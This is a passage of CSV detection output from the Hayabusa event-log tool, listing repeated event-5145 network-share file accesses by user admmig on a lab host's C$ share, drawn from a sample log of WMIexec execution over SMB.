2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\nl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\no | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\pt-BR | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ro | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ru | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sl | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sr-Latn-RS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\sv | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\th | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\tr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\uk | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.448 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HANT | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\zh-HK | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppCompat\Programs\DevInvCache | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\apppatch64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\Custom\Custom64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\apppatch\en-US | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\AppReadiness | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP 